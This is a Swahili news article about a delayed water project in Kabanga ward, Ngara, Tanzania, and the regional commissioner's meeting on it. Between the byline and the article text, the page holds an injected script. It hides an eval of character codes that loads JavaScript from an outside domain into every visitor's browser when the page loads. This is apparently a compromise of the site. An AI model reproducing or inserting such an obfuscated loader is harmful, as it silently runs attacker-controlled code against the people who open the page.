Recent Comments

TAREHE 30-08-2023 KABANGA KUPATA MAJI SAFI NA SALAMA

By Mwafrika Aug 15, 2023
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

NA

ANKO G

Changamoto ya maji sasa inaenda kutatuliwa katika kata ya Kabanga baada ya serikali kupitia idara ya RUWASA Ngara kuahidi kuwa kufikia Tarehe 30/08/2023 maji yataanza kutoka ambapo mradi huo utaweza kuhudumia eneo kubwa la kijiji cha Kabanga.

Kupitia mkutano wa hadhara ulio fanywa na Mkuu wa mkoa Fatma Mwasa, meneja wa RUWASA Wilaya ya Ngara alisema kuwa changamoto ya mradi huo kuchelewa ni kukosekana kwa pump ya maji ambapo mkadarasi aliiagiza nje ya nchi hivyo kufikia tarehe 30 Agost meneja huyo aliuhakikishia uma kuwa maji yatakua yameanza kutoka.Aidha maji yamekua kikwazo katika kata ya Kabanga na vijiji vyake hususa ni kipindi hiki cha kiangazi ambapo baaadhi ya wakazi wa kata hiyo hulazimika kuchota maji katika vyanzo vya maji vya watu binafsi huku simamia.com ikishuhudia foleni kubwa ya wachota maji na wengine wakichota katika mabonde yanayo patikana katika kata hiyo jambo ambalo linazorotesha shughuli za uzalishaji kwani wakazi wengi wa kata hiyo hulazimika kutumia muda mwingi kutafuta maji badala ya kufanya shughuli za uzalishaji.

Nidhahiri kuwa maji ni uhai ambapo shughuli nyingi za bianadamu huhitaji maji hivyo matarajio ya wakazi wa kabanga kwa mradi huo kuwa huenda utawakomboa na kuleta nuru mpya na kupata muda zaidi wa kufanya shughuli za uzalishaji badala ya kutumia muda mwingi kutafuta maji.Hata hivyo mradi huo hauta weza kuhudumia vijiji vyote vya kata ya kabanga bali mradi huo utahudumia sehemu kubwa ya kijiji cha kabanga na kijiji cha Mrukukumbo huku kijiji cha Ngundusi,Ibuga,Nyabisindu na Djuruligwa vikiwa siyo sehemu ya wanufaika wa mradi huo kwa awamu hii yakwanza.

Vilevile bado kuna uhitaji mkubwa wa maji katika vijiji vinavyo unda kata ya kabanga ambapo baadhi ya vitongoji hutumia maji ya mabondeni ambayo ni hatari kwa afya zao lakini pia hutumia muda mrefu kufuata maji hayo.

Ikumbukwe kuwa mradi huu wa maji katika kijiji cha kabanga unaghalimu kisai cha Tsh Milioni 941 Mpaka kukamilika kwake ambapo matumaini ya wakazi wa kabanga ni kuwa mradi huo unakwenda kupunguza changamoto ya maji tofauti na hali iliyopo kwa sasa.